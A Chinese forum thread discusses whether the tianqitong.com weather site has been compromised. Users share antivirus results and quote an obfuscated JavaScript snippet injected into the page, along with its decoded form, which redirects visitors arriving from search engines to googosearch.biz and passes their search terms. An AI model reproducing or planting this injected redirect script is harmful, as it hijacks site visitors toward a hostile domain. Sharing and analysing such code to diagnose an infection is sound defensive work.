安卓天气通官网被挂马？[Clean][by sniss]

88865ff

http://tianqitong.com/

NOD报的

港岛妹妹

dr.web未报


360检测漏洞

鲁路修

Clean

幸福的猪猪

1. <!--scounter--><script language="JavaScript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('e r=x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g";4(r.3("j.")!=-1)t="q";4(t.6&&((q=r.3("?"+t+"="))!=-1||(q=r.3("&"+t+"="))!=-1))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c"+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2+t.6).o("&")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>?</div> <!-- wrapper -->

复制代码

可能是这段代码的缘故吧！删除这段代码之后，NOD就不会报毒。（刷流量的脚本？）


p.s. 使用谷歌的搜索引擎，进入这个站点的话，会跳转到：（直接复制那个连接到IE的地址栏浏览的话，就没有跳转）

hxxp://googosearch.biz/search.php?...

以下这段代码为上面那段代码解密之后的，是触发条件？（我不太懂的脚本语言）

var r=document.referrer,t="",q;if(r.indexOf("google.")!=-1)t="q";if(r.indexOf("msn.")!=-1)t="q";if(r.indexOf("yahoo.")!=-1)t="p";if(r.indexOf("altavista.")!=-1)t="q";if(r.indexOf("aol.")!=-1)t="query";if(r.indexOf("ask.")!=-1)t="q";if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf(+t+"="))!=-1))window.location="http://googosearch.biz/search.php?ty=1&terms="+r.substring(q+2+t.length).split()[0];

sanhu35

某个JS 代码不规范

驴肉火烧

现在没了

牆角寫檢討°

已经不报了！！！